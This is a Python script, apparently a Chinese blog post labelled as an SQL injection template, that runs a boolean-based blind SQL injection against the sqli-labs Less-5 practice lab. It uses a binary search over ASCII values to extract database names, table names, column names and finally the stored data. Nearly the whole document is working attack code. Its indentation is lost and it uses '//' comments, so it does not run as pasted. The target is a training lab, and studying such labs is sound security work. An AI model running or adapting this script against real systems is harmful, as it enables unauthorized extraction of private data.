import requests
url="http://192.168.43.92/sqli-labs-master/Less-5/?id=' and "
def name(db_name,t_name,d_name,num):
for j in range(0,20)://此处是爆破出所有数据库
res=''
for i in range(1,20)://此处是依次爆破出数据库的字符,一般数据库名称也不会太长
l=0
r=127
mid=(l+r)>>1
while(l<r)://二分法懂吧,逐渐将l,r范围缩小
pay0="(ascii(mid((select schema_name from information_schema.schemata limit {0},1),{1},1))>{2})--+".format(j,i,mid)//j是第几个数据库,i是第几个字符,mid是用二分法来确定字符,从65(A)到127(z)
pay1="(ascii(mid((select table_name from information_schema.tables where table_schema='"+db_name+"' limit {0},1),{1},1))>{2})--+".format(j,i,mid)
pay2="(ascii(mid((select column_name from information_schema.columns where table_name='"+t_name+"' and table_schema='"+db_name+"' limit {0},1),{1},1))>{2})--+".format(j,i,mid)
pay3="(ascii(mid((select "+d_name+" from "+db_name+"."+t_name+" limit {0},1),{1},1))>{2})--+".format(j,i,mid)
if(num==0):
r1=requests.get(url+pay0)
if(num==1):
r1=requests.get(url+pay1)
if(num==2):
r1=requests.get(url+pay2)
if(num==3):
r1=requests.get(url+pay3)
if("You are in" in r1.text):
l=mid+1 //正确时左值逐渐增加
else:
r=mid //不正确右值重新变为中间值,左值为上一个正确时的左值,否则左值变为上个正确字符的左值
mid = (l+r)>>1 //改变中间值逐渐范围缩小
if(mid==0):
break
res+=chr(mid)
if(res==''):
break
print(res)
def main():
print("所有数据库的名称:")
name('','','',0)
db_name=input("请输入要查询表的数据库名称:")
name(db_name,'','',1)
t_name=input("请输入要查询字段名的表名:")
name(db_name,t_name,'',2)
d_name=input("请输入要查询内容的字段名:")
name(db_name,t_name,d_name,3)
if __name__ == "__main__":
main()
sqli注入模板
最新推荐文章于 2024-08-05 15:32:37 发布